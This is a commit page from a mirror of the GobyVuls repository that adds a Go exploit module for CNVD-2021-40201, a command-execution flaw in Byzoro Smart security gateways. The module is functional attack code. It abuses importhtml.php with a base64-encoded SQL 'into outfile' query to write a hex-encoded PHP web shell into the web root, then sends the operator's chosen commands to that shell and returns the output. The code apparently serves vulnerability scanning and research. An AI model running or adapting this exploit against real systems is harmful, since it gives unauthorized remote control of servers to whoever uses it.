admin/GobyVuls
1
0
Fork 0
mirror of https://github.com/gobysec/GobyVuls.git synced 2025-06-20 09:50:49 +00:00
Code Issues Packages Projects Releases Wiki Activity

Add CNVD-2021-40201

Browse Source
This commit is contained in:
xiaoheihei1107 2021-08-18 11:00:10 +08:00 committed by GitHub
parent a5da703475
commit 32365ee2f8
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 102 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

102
Byzoro/CNVD-2021-40201/Byzoro_smart_importhtml_php_RCE_CNVD_2021_40201.go Normal file
View File

@ -0,0 +1,102 @@
package exploits
import (
"encoding/base64"
"fmt"
"git.gobies.org/goby/goscanner/goutils"
"git.gobies.org/goby/goscanner/jsonvul"
"git.gobies.org/goby/goscanner/scanconfig"
"git.gobies.org/goby/httpclient"
"strings"
)
func init() {
expJson := `{
"Name": "Byzoro smart importhtml.php RCE (CNVD-2021-40201)",
"Description": "Byzoro Networks Smart multi-service security gateway intelligent management platform has a command execution vulnerability. Attackers can use this vulnerability to gain control of the server.",
"Product": "Byzoro-Smart,Byzoro-Security-gateway",
"Homepage": "https://www.byzoro.com/",
"DisclosureDate": "2021-07-06",
"Author": "1291904552@qq.com",
"GobyQuery": "app=\"Byzoro-Smart\"||app=\"Byzoro-Security-gateway\"",
"Level": "2",
"Impact": "<p></p>",
"Recommandation": "",
"References": [
"https://www.cnvd.org.cn/flaw/show/CNVD-2020-28786",
"https://www.cnvd.org.cn/flaw/show/CNVD-2021-40201"
],
"HasExp": true,
"ExpParams": [
{
"name": "cmd",
"type": "input",
"value": "id"
}
],
"ExpTips": null,
"ScanSteps": null,
"ExploitSteps": null,
"Tags": [
"rce"
],
"CVEIDs": null,
"CVSSScore": "0.0",
"AttackSurfaces": {
"Application": ["Byzoro-Smart","Byzoro-Security-gateway"],
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}`
ExpManager.AddExploit(NewExploit(
goutils.GetFileName(),
expJson,
func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {
randFilename := goutils.RandomHexString(4)
sqlQuery := `select 0x3c3f706870206563686f206d643528323333293b756e6c696e6b285f5f46494c455f5f293b3f3e into outfile '/usr/hddocs/nsg/app/`+randFilename+`.php'`
uri_1 := `/importhtml.php?type=exporthtmlmail&tab=tb_RCtrlLog&sql=`+base64.StdEncoding.EncodeToString([]byte(sqlQuery))
cfg_1 := httpclient.NewGetRequestConfig(uri_1)
cfg_1.VerifyTls = false
if resp_1, err := httpclient.DoHttpRequest(u, cfg_1); err == nil {
if resp_1.StatusCode == 200 {
uri_2 := "/app/"+randFilename+".php"
cfg_2 := httpclient.NewGetRequestConfig(uri_2)
cfg_2.VerifyTls = false
if resp_2, err := httpclient.DoHttpRequest(u, cfg_2); err == nil {
return resp_2.StatusCode == 200 && strings.Contains(resp_2.RawBody,"e165421110ba03099a1c0393373c5b43")
}
}
}
return false
},
func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult {
cmd := ss.Params["cmd"].(string)
randFilename := goutils.RandomHexString(4)
sqlQuery := `select 0x3c3f706870206563686f2073797374656d28245f504f53545b22636d64225d293b3f3e into outfile '/usr/hddocs/nsg/app/`+randFilename+`.php'`
uri_1 := `/importhtml.php?type=exporthtmlmail&tab=tb_RCtrlLog&sql=`+base64.StdEncoding.EncodeToString([]byte(sqlQuery))
cfg_1 := httpclient.NewGetRequestConfig(uri_1)
cfg_1.VerifyTls = false
if resp_1, err := httpclient.DoHttpRequest(expResult.HostInfo, cfg_1); err == nil {
if resp_1.StatusCode == 200 {
uri_2 := "/app/"+randFilename+".php"
cfg_2 := httpclient.NewPostRequestConfig(uri_2)
cfg_2.VerifyTls = false
cfg_2.Header.Store("Content-Type","application/x-www-form-urlencoded")
cfg_2.Data = fmt.Sprintf(`cmd=%s`,cmd)
if resp_2, err := httpclient.DoHttpRequest(expResult.HostInfo, cfg_2); err == nil {
if resp_2.StatusCode == 200{
expResult.Output = resp_2.RawBody
expResult.Success = true
}
}
}
}
return expResult
},
))
}